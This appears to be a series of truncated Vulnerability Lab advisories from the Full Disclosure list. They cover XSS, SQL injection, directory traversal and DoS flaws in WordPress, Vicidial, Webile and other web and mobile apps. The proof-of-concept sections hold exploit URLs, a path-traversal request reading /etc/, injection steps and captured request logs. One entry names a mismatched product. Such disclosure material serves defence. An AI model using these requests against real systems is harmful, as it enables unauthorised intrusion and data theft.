The non-persistent cross site scripting web vulnerability can be exploited by 
remote attackers with contributor or author user account (authenticated)
and with low user interaction. For security demonstration or to reproduce the 
cross site web vulnerability follow the provided
information and steps below to continue.


Note: Cross-Site Scripting will be executed, since in all the sections where 
the editor and search engine of the
add block function can be used as well as in the post and page section of the 
editor with the copy and paste function.


POC1:The malicious Excerpt will be executed in the post and page sections at 
the moment you want to use the add new block
function and typing some name in the search engine of the add block function 
reflecting it in all the wordpress editor sections.

1.) Login whit user author or contributor
2.) Add new post
3.) Add Block Post Excerpt
4.) Add malicious code in the Extract function () 
5.) Replicated


POC2 IN BLOCK FUCTION
1.) Login whit user author
2.) Add new post
3.) Publish Post
4.) Add malicious code in the Extract function () 
5.) In the post editor add a new block

6.) Search for something in the block search engine7.) Replicated

POC3: XSS IN POST & PAGE EDITOR
1.) Login whit user author or contributor
2.) Add new post
3.) Copy & Page () in editor4.) 
4.) Replicated



Firefox Payload:




Chrome Payload:
XSS



Poc Image:
https://i.imgur.com/WiaEUEE.png
https://i.imgur.com/voJptm0.png

Poc Video
https://www.youtube.com/watch?v=hUY00Vg6wOk


Solution - Fix & Patch:
===
The vulnerability can be resolved by a encode and secure parse / escape of the 
inputs.
In a second step the output location were the execute occurs needs to be 
sanitized.

Note: Wordpress is informed about the issue and is in progress to develop an 
update. The researcher notet to public disclose the finding immediatly.
Until the patch is available, ensure that only trusted persons have access to 
contributor or author roles. As alternativ it is possible
to deactivate the accounts until a patch is available.


Credits & Authors:
==
TaurusOmar (@TaurusOmar_) 
-https://www.vulnerability-lab.com/show.php?user=TaurusOmar


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties

[FD] Vicidial v2.14-783a - (DB) SQL Injection Web Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Vicidial v2.14-783a - (DB) SQL Injection Web Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2312


Release Date:
=
2022-02-17


Vulnerability Laboratory ID (VL-ID):

2312


Common Vulnerability Scoring System:

7.3


Vulnerability Class:

SQL Injection


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Vicidial is a software suite that is designed to interact with the Asterisk 
Open-Source PBX Phone system to act
as a complete inbound/outbound contact center suite with inbound email support 
as well. The agent interface is an
interactive set of web pages that work through a web browser to give real-time 
information and functionality with
nothing more than an internet browser on the client computer. The management 
interface is also web-based and
offers the ability to view many real-time and summary reports as well as many 
detailed campaign and agent options
and settings. VICIDIAL can function as an ACD for inbound calls or for Closer 
calls coming from VICIDIAL outbound
fronters and even allows for remote agents logging in from remote locations as 
well as remote agents that may only
have a phone. There are currently over 24,000 installations of VICIDIAL in 
production in over 100 countries around
the world, several with over 300 agent seats and many with multiple locations.

(Copy of the Homepage:https://www.vicidial.org/vicidial.php  )
(Download:https://www.vicidial.org/vicidial.php  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a sql-injection web 
vulnerability in the Vicidial v2.14-783a web-application.

Affected Product(s):

Vicidial Group
Product: Ametys v4.4.1 - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==
2022-01-02: Researcher Notification & Coordination (Security Researcher)
2022-01-03: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-02-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
High


Authentication Type:

Restricted Authentication (User Privileges)


User Interaction:
=
No User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A remote sql injection web vulnerability has been discovered in the official 
Vicidial v2.14-783a web-application.
The vulnerability allows remote attackers to execute own sql commands to 
compromise the web-applicaation or connected dbms.

The vulnerability is located in the `DB` parameter of the `AST_IVRstats.php`, 
`AST_LISTS_pass_report.php`, `AST_usergroup_login_report.php`
and `admin_lists_custom.php` files. Remote attackers are able to execute sql 
commands by injection of malicious statements via GET method
request by the DB parameter.

The security risk of the sql injection vulnerability is estimated as high with 
a cvss (common vulnerability scoring system) count of 7.1.
Exploitation of the remote sql injection web vulnerabilities requires no user 
interaction but a agent or moderator web-application user account.
Successful exploitation of the remote sql injection results in database 
management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] AST_IVRstats.php
[+] AST_LISTS_pass_report.php
[+] AST_usergroup_login_report.php
[+] admin_lists_custom.php

Vulnerable Parameter(s):
[+] DB


Proof of Concept (PoC):
===
The remote sql-injection web vulnerability can be exploited by privileged user 
with agent or manager access without user interaction.
For security demontration or to reproduce the security vulnerability follow the 
provided information and steps below to continue.


PoC: Exploitation
https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=[SQL-INJECTION!]&type=inbound&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59
https://vicidial.localhost:8080/vicidial/AST_LISTS_pass_report.php?DB=[SQL-INJECTION!]&use_lists=&report_display_type=HTML&SUBMIT=SUBMIT
https://vicidial.localhost:8080/vicidial/AST_usergroup_login_report.php?DB=[SQL-INJECTION!]&type=&user_group[]=001&report_display_type=HTML&SUBMIT=SUBMIT
https://vicidial.localhost:8080/vicidial/admin_lists_custom.php?action=DELETE_CUSTOM_FIELD_CONFIRMATION&list_id=108&fie

[FD] MartFury Marketplace - Cross Site Scripting Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
MartFury Marketplace - Cross Site Scripting Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2282


Release Date:
=
2022-02-17


Vulnerability Laboratory ID (VL-ID):

2282


Common Vulnerability Scoring System:

5.5


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Martfury is a clean & modern Laravel Ecommerce System for multipurpose online 
stores. With design clean and trendy, Martfury will make your
online store look more impressive and attractive to viewers. Help increase the 
high conversion rate to buy products with your customers
so quickly. Designed on the grid system, your site will look sharp on all 
screens. Mobile optimized design based on user experience, brings
the best shopping experience for your customers.

(Copy of the 
Homepage:https://codecanyon.net/item/martfury-multipurpose-laravel-ecommerce-system/29925223
  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent cross 
site scripting web vulnerability in the official MartFuryonline service 
web-application.


Affected Product(s):

Botble
Product: MartFury - Online Service (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-08-22: Researcher Notification & Coordination (Security Researcher)
2021-08-23: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-02-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (User Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A persistent cross site scripting web vulnerability has been discovered in the 
official MartFury online service web-application.
The web vulnerability allows remote attackers to inject own malicious script 
codes with persistent attack vector to compromise
browser to web-application requests from the application-side.

The vulnerability is located in the products description and name parameters of 
the create function in the products module (martfury dashboard).
Remote attackers with privileged account access (user to vendor by product) are 
able to inject own malicious products. After a product is saved
any customer that buys the article executes the malicious inject payload on events 
like favorite & compare. On the request a confirm information
is displayed on the left top of the application that executes the script code 
with persistent attack vector. The request method to inject is post
and the attack vector is persistent located on the application-side.

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent external redirects to malicious
source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Status Notifcation

Vulnerable Input(s):
[+] Name
[+] Description

Vulnerable Parameter(s):
[+] name
[+] description

Affected Module(s):
[+] Compare
[+] Favorite


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote 
attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the persistent cross site web 
vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Register an account
2. Move to vendor dashboard
3. Register an account
4. Go to products and create a product
5. Inject payload to name and description
6. Save by submit via post method request
7. Preview the public product
8. Click compare or the favorites button
9. Status displays and executes the malicious script code with persistent 
attack vector
10. Successful reproduce of the persistent web vulnerability!


Exploitation: Payload



--- PoC Session Logs (POST) (Inject) [Name & Description] ---
https://martfury.localhost:8080/vendor/products/create
Host: martfury.localhost:8080
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; 
boundary=---312580254331809165411596595054
Content-Length: 4034
Origin:https://martf

[FD] Knap (APL) v3.1.3 - Persistent Cross Site Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Knap (APL) v3.1.3 - Persistent Cross Site Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2307


Release Date:
=
2022-10-10


Vulnerability Laboratory ID (VL-ID):

2307


Common Vulnerability Scoring System:

5.7


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Knap is an advanced User Management software written in Laravel 5.4 (PHP 
Framework) that allows the admin to manage users.



Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent cross 
site web vulnerability in the Knap Advanced PHP Login v3.1.3 user management 
web-application.


Affected Product(s):

ajay138
Product: Knap Advanced PHP Login v3.1.3 - User Management (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-10-10: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (User Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A persistent input validation web vulnerability has been discoveredin the Knap 
Advanced PHP Login v3.1.3 user management web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise browser to web-application
requests from the application-side.

The persistent cross site web vulnerability is located in the name parameter of 
the Profile Account - Account Information module.
Remote attackers with ow privileged user accounts are able to inject own 
malicious script code as name to provoke an execution
of the malicious content inside the users and activity log backend modules. The 
request method to inject is post. The injection
points are the user create or update and the execution of the maliciou script 
code occurs in the activity log and users listings.

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Register (Site)
[+] Update (Account Information)

Vulnerable Input(s):
[+] Name

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] ./users
[+] ./activity


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote 
attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the persistent cross site web 
vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Register as user or get registered by the admin
2. Start your web browser and a session tamper or debug tools
3. Open the My Profile menu with the Profile Account information section
4. Change the name input to your script code test payload and save via submit 
(post)
Note: The injected payload executes successfully in the users list (backend) 
and within the activity log on history (backend) on preview by admins or mods
5. Successful reproduce of the persistent cross site scripting web 
vulnerability!


--- PoC Session Logs (POST [Inject via User Role by Profile Account 
Update|Create] ---
https://knap.froid.works/profiles/102
Host: knap.froid.works
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; 
boundary=---73425417436906186553080920069
Content-Length: 29455
Origin:https://knap.froid.works
Connection: keep-alive
Referer:https://knap.froid.works/profile-edit
Cookie: 
laravel_session=eyJpdiI6Ikt4Zmd3WDVSeThObVlvbnZld1JadWc9PSIsInZhbHVlIjoiN3pubk1YaVwvaWp6aWF2QlNwb3l2T2
h5MzdHZjJUd0Y2em1mUXE4Q1wvZHhnbkhwUW1ZaDU3aytaWFNURk5pc1M4IiwibWFjIjoiM2UwMTg0MGQ0M2VjMDk0YTVkN2M0ZGVjOWM5NmI1NDMzYzUxODU5ZmVkNmNmZDJlMTc5ZmVlYThiNTlkODIxZCJ9
0=_&1=t&2=o&3=k&4=e&5=n&6==&7=S&8=B&9=0&10=q&11=T&12=5&13=b&14=O&15=B&16=k&17=R&18=w&19=d&20=n&21=U&22=J&23=M&24=A&25=z&26=g&27=B
&2

[FD] Vicidial v2.14-783a - Multiple XSS Web Vulnerabilities

[i...@vulnerability-lab.com]

Document Title:
===
Vicidial v2.14-783a - Multiple XSS Web Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2311


Release Date:
=
2022-10-11


Vulnerability Laboratory ID (VL-ID):

2311


Common Vulnerability Scoring System:

5.2


Vulnerability Class:

Cross Site Scripting - Non Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
VICIDIAL is a software suite that is designed to interact with the Asterisk 
Open-Source PBX Phone system to act
as a complete inbound/outbound contact center suite with inbound email support 
as well. The agent interface is an
interactive set of web pages that work through a web browser to give real-time 
information and functionality with
nothing more than an internet browser on the client computer. The management 
interface is also web-based and
offers the ability to view many real-time and summary reports as well as many 
detailed campaign and agent options
and settings. VICIDIAL can function as an ACD for inbound calls or for Closer 
calls coming from VICIDIAL outbound
fronters and even allows for remote agents logging in from remote locations as 
well as remote agents that may only
have a phone. There are currently over 24,000 installations of VICIDIAL in 
production in over 100 countries around
the world, several with over 300 agent seats and many with multiple locations.

(Copy of the Homepage:https://www.vicidial.org/vicidial.php  )
(Download:https://www.vicidial.org/vicidial.php  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple client-site 
cross site scripting vulnerabilities in the VICIDIAL v2.14-783a web-application.

Affected Product(s):

Vicidial Group
Product: Vicidial v2.14-783a - (Web-Application)


Vulnerability Disclosure Timeline:
==
2022-01-15: Researcher Notification & Coordination (Security Researcher)
2022-01-16: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-10-11: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Pre Auth (No Privileges or Session)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

Multiple non-persistent cross site scripting web vulnerabilities has been 
discovered in the official VICIDIAL v2.14-783a web-application.
The vulnerability allows remote attackers to inject malicious script code in 
post method requests to compromise user session data
or to manipulate application contents for clients.

The vulnerabilities are located in the `end_date`, `query_date`, `shift`, 
`type`, `use_lists`,  `search_archived_data`, `start_hour`, `end_hour`,
`stage`, `agent`, `user`, `db` parameters of the vulnerable `AST_IVRstats.php`, 
`AST_LISTS_pass_report.php`, `AST_user_group_hourly_detail.php`,
`AST_agent_time_sheet.php`, `AST_agent_days_detail.php`, `user_status.php`, 
`admin_lists_custom.php` and `admin.php` files. Remote attackers
are able to create special crafted malicious links to execute client-side 
script code from the application context. The request method to inject
is GET and the attack vector is non-persistent. The identified web 
vulnerabilities are classic cross site scripting issues.

Successful exploitation of the vulnerability results in session hijacking, 
non-persistent phishing attacks, non-persistent external redirects to
malicious source and non-persistent manipulation of affected application 
modules.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] AST_IVRstats.php
[+] AST_LISTS_pass_report.php
[+] AST_user_group_hourly_detail.php
[+] AST_agent_time_sheet.php
[+] AST_agent_days_detail.php
[+] user_status.php
[+] admin_lists_custom.php
[+] admin.php

Vulnerable Parameter(s):
[+] end_date
[+] query_date
[+] shift
[+] type
[+] use_lists
[+] search_archived_data
[+] start_hour
[+] end_hour
[+] stage
[+] agent
[+] user
[+] db

Affected Module(s):
[+] Backend Administration Web UI (Agents, Managers & Admins)


Proof of Concept (PoC):
===
The client-side post inject web vulnerability can be exploited by remote 
attackers without account and with low or medium user interaction.
For security demonstration or to reproduce the cross site web vulnerability 
follow the provided information and steps below to continue.


Vulne

[FD] Stripe Green Downloads 2.03 - Cross Site Scripting Web Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Stripe Green Downloads 2.03 - Cross Site Web Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2287


Release Date:
=
2022-10-17


Vulnerability Laboratory ID (VL-ID):

2287


Common Vulnerability Scoring System:

5.2


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Easily configure the plugin to accept payments through Stripe with Strong 
Customer Authentication. Easily style payment button
with overall styling settings. Tons of options for any needs. Host files in 
secured folder, Media Library (WordPress plugin only)
or anywhere on your server. Send custom email notifications to buyer and 
administrator after successful payments. Collect statistics
of button impressions, payments and downloads for any file for any period.

(Copy of the Homepage:https://halfdata.com/green-downloads/stripe/  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent cross 
site vulnerability in the Stripe Green Downloads web-application and wordpress 
plugin.


Affected Product(s):

halfdata
Product: Stripe Green Downloads - Admin Panel v1.0 (Web-Application)
Product: Stripe Green Downloads - Wordpress Plugin 2.03 (Web-Application)


Vulnerability Disclosure Timeline:
==
2022-10-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (Moderator Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in the 
Stripe Green Downloads web-application and wordpress plugin v2.03.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise browser to
web-application requests from the application-side.

The persistent xss web vulnerability is located in the `Label`, `Processing 
label` and `Download label` input fields of the
`Green Downloads - Settings - Button` module. Attackers with local privileged 
to access the panel are able to inject own
malicious script code to the button that executes the content in the preview 
context. The request method to inject is post
and the attack vector is persistent on the application-side. The vulnerable 
parameters are `idcore-button-label`,
`idcore-button-label-processing` and `idcore-button-label-download`.

Successful exploitation of the vulnerability results in session hijacking, 
non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent manipulation of 
affected application modules.

Vulnerable Module(s):
[+] Green Downloads - Settings - Button

Vulnerable Input(s):
[+] Label
[+] Processing label
[+] Download label

Vulnerable Parameter(s):
[+] idcore-button-label
[+] idcore-button-label-processing
[+] idcore-button-label-download

Affected Module(s):
[+] Preview (/stripe/script/?page=idcore-settings)


Proof of Concept (PoC):
===
The client-side cross site scripting web vulnerability can be exploited by 
remote attackers with privileged account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability 
follow the provided information and steps below to continue.


Vulnerable Source: /stripe/script/?page=idcore-settings

Preview:
.idcore-preview-button{font-family:'Strait','arial';font-size:20px;color:#ff;font-weight:normal;font-style:normal;
text-decoration:none;text-transform:uppercase;width:250px;height:56px;line-height:56px;background-color:#d4150b;
background-image:linear-gradient(to bottom,rgba(255,255,255,.05) 
0,rgba(255,255,255,.05) 50%,rgba(0,0,0,.05) 51%,rgba(0,0,0,.05) 100%);
border-width:1px;border-style:solid;border-color:#d4150b;border-radius:3px;box-shadow:
 2px 2px 0px 0px rgba(68, 68, 68, 0.2);}
Download Now!>"



--- PoC Session Logs (POST) ---
https://green-downloads.localhost:8080/green-downloads/demo/stripe/script/ajax.php
Host: green-downloads.localhost:8080
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 4829
Origin:https://green-downloads.localhost:8080
Connection: keep-alive
Referer:https://green-downloads.localhost:8080/green-downloads/demo/stripe/script/?page=idcore-settings
Cookie: uap-auth=njqYqYrjVyg7aWCO; 
__stripe_mid=29

[FD] Webile v1.0.1 - Directory Traversal Web Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Webile v1.0.1 - Directory Traversal Web Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2320


Release Date:
=
2022-10-10


Vulnerability Laboratory ID (VL-ID):

2320


Common Vulnerability Scoring System:

7.3


Vulnerability Class:

Directory- or Path-Traversal


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Webile, is a local area network cross-platform file management tool based on 
http protocol. Using the personal mobile phone as a server in
the local area network, browsing mobile phone files, uploading files, 
downloading files, playing videos, browsing pictures, transmitting data,
statistics files, displaying performance, etc. No need to connect to the 
Internet, you can browse files, send data, play videos and other
functions through WiFi LAN or mobile phone hotspot, and no additional data 
traffic will be generated during data transmission. Support Mac,
Windows, Linux, iOS, Android and other multi-platform operating systems.

(Copy of the 
Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US
  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a directory 
traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.

Affected Product(s):

Product Owner: Webile
Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)


Vulnerability Disclosure Timeline:
==
2022-02-06: Researcher Notification & Coordination (Security Researcher)
2022-02-07: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-10-10: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
High


Authentication Type:

Open Authentication (Anonymous Privileges)


User Interaction:
=
No User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

A directory traversal web vulnerability has been discovered  in the Webile 
v1.0.1 wifi mobile web application.
The vulnerability allows remote attackers to change the application path in 
performed requests to compromise the
local application or file-system of a mobile device. Attackers are for example 
able to request environment
variables or a sensitive system path.

The directory-traversal web vulnerability is located in the insecure web-server 
configuration. The path of the local user is not
secure restricted and validated. Thus allows an unauthenticated user with wifi 
access to request local web-server files without
secure permission. The bug itself is located in the filepath parameter of the 
change_upload_dir function.

Exploitation of the directory traversal web vulnerability requires no 
privileged web-application user account or user interaction.
Successful exploitation of the vulnerability results in information leaking by 
unauthorized file access and mobile application compromise.


Proof of Concept (PoC):
===
The directory traversal web vulnerability can be exploited by remote attackers 
without user account or user interaction.
For security demonstration or to reproduce the web vulnerability follow the 
provided information and steps below to continue.


PoC: Exploitation
http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/


--- PoC Session Logs ---
http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 
Firefox/102.0
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked


--- FS Session Logs ---
Output:
File name   
bluetooth
bpf
carrier
compatconfig
init
permissions
ppp
seccomp_policy
security
selinux
sensors
sysconfig
textclassifier
theme
vintf
epdg
ipm


Security Risk:
==
The security risk of the directory traversal web vulnerability in the mobile 
web application is estimated as high.


Credits & Auth

[FD] WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities

[i...@vulnerability-lab.com]

Document Title:
===
WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2322


Release Date:
=
2022-10-17


Vulnerability Laboratory ID (VL-ID):

2322


Common Vulnerability Scoring System:

5.6


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
WiFi File Transfer lets you transfer files to/from your phone or tablet via 
WiFi. Easy to use web interface, no USB cable required.

(Copy of the 
Homepage:https://play.google.com/store/apps/details?id=com.smarterdroid.wififiletransfer&hl=de&gl=US
  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a multiple 
persistent cross site vulnerabilities in the WiFi File Transfer v1.0.8 mobile 
android web-application.

Affected Product(s):

smarterDroid
Product: WiFi File Transfer v1.0.8 - Android (Wifi) (Web-Application)


Vulnerability Disclosure Timeline:
==
2022-10-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Open Authentication (Anonymous Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in the WiFi 
File Transfer v1.0.8 mobile web-application for android.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise browser to web-application
requests from the application-side.

The vulnerabilities are located in the data_file parameter of the add a file or 
folder and create a zip file function.
Attackers with wifi access are able to anonymous use the webui and can inject 
own malicious script code with persistent
attack vector via post method request.

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected 
application modules.


Proof of Concept (PoC):
===
The persistent post inject web vulnerabilities can be exploited by remote 
attackers in the same wifi network with anonymous privileges and low user 
interaction.
For security demonstration or to reproduce the web security vulnerability in 
the application follow the provided information and steps below to continue.


Manual reproduce of the vulnerability ...
1. Install the mobile android application and start it
2. Start the wifi web-server
3. Login as attacker by the browser over the network
4. Inject payload as folder name, file name or zip file and save via post 
method request
5. The payload executes in the web ui when previewing the paths


Exploitation: Payload
picture1337.jpg


--- PoC Session Logs #1 (POST) [Add] [Create] [Folder] [data_file] ---
http://localhost:1234/storage/emulated/0/DCIM/
Host: localhost:1234
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; 
boundary=---321836412920954805143620932676
Content-Length: 613
Origin:http://localhost:1234
Connection: keep-alive
Referer:http://localhost:1234/storage/emulated/0/DCIM/
action=mkdir&data_file=New">picture1337.jpg&data_currentParams=?&data_filepath=/storage/emulated/0/DCIM/
-
POST: HTTP/1.1 302 OK
Connection: Close
Content-Type: text/html
Location:http://localhost:1234/storage/emulated/0/DCIM/
Content-Length: 143
-
http://localhost:1234/storage/emulated/0/DCIM/
Host: localhost:1234
Accept-Encoding: gzip, deflate
Referer:http://localhost:1234/storage/emulated/0/DCIM/
Connection: keep-alive
-
POST: HTTP/1.1 200 OK
Connection: Close
Content-Type: text/html


--- PoC Session Logs #2 (POST) [Add] [Create] [Zip] [data_file] ---
http://localhost:1234/storage/emulated/0/Pictures/?
Host: localhost:1234
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; 
boundary=---289297208414223233314228108045
Content-Length: 882
Origin:http://localhost:1234
Connection: keep-alive
Referer:http://localhost:1234/storage/emulated/0/Pictures/?
Upgrade-Insecure-Requests: 1
action=multizip&data_file=.File.Zip.Zip&data_currentParams=?&data_filepath=/storage/emulated/0/Pictures/&1.jpg=file&2.jpg=file
-
POST: HTTP/1.1 200 OK
Connection: Close
Content-Type: text/html
Location:http://localhost:1234/storage/emulated/0/Pictures/
Content-Length: 151
-
http://localhost:1234/storage/emulated/0

[FD] MapTool v1.11.5 - Denial of Service Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
MapTool v1.11.5 - Denial of Service Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2318


Release Date:
=
2022-10-10


Vulnerability Laboratory ID (VL-ID):

2318


Common Vulnerability Scoring System:

5.7


Vulnerability Class:

Denial of Service


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
MapTool is a fully featured, flexible virtual tabletop. Not only does MapTool 
come with powerful tools for creating detailed maps
but also a chat function, an initiative tracker, and a detailed token 
management system to create characters, monsters, objects,
and anything you can imagine. MapTool's user interface is highly configurable, 
and features not being used can be hidden out of sight.
The latest version of MapTool can be found on GitHub. MapTool attempts to use 
Semantic Versioning to help groups know whether a change
may break their game or not so they can decide when to upgrade. Exciting new 
features can be tested in development (alpha or beta) builds,
but for your game where stability matters sticking to the major releases is 
recommended. MapTool campaigns saved in newer versions may not
work on older versions, so be careful with your campaign files when trying out 
development builds.

(Copy of the Homepage:https://wiki.rptools.info/index.php/MapTool  )
(Download Software:https://www.rptools.net/toolbox/download-rptools-products  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a remote denial of 
service vulnerability in the official MapTool v1.11.5 software.

Affected Product(s):

Rptools
Product: MapTool v1.11.5 - (Windows) (Linux) (MacOS)


Vulnerability Disclosure Timeline:
==
2022-06-03: Researcher Notification & Coordination (Security Researcher)
2022-06-04: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-10-10: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (Guest Privileges)


User Interaction:
=
No User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

The remote denial of service software vulnerability is located in the chat 
function of the official MapTool v1.11.5 windows software.
Attackers with chat access can transmit a malformed special crafted payload 
that returns a null pointer in javax.swing.text.html.StyleSheet
(javax.swing.text.View) and javax.swing.text.html.BlockView.layoutMinorAxis. 
Attacker are able to inject payloads to crash the application
immediatly and permanently. The compromised communication and project can be 
saved as cmpgn file and crashs the application on each import
with the unhandled null pointer exception.

Vulnerable Module(s):
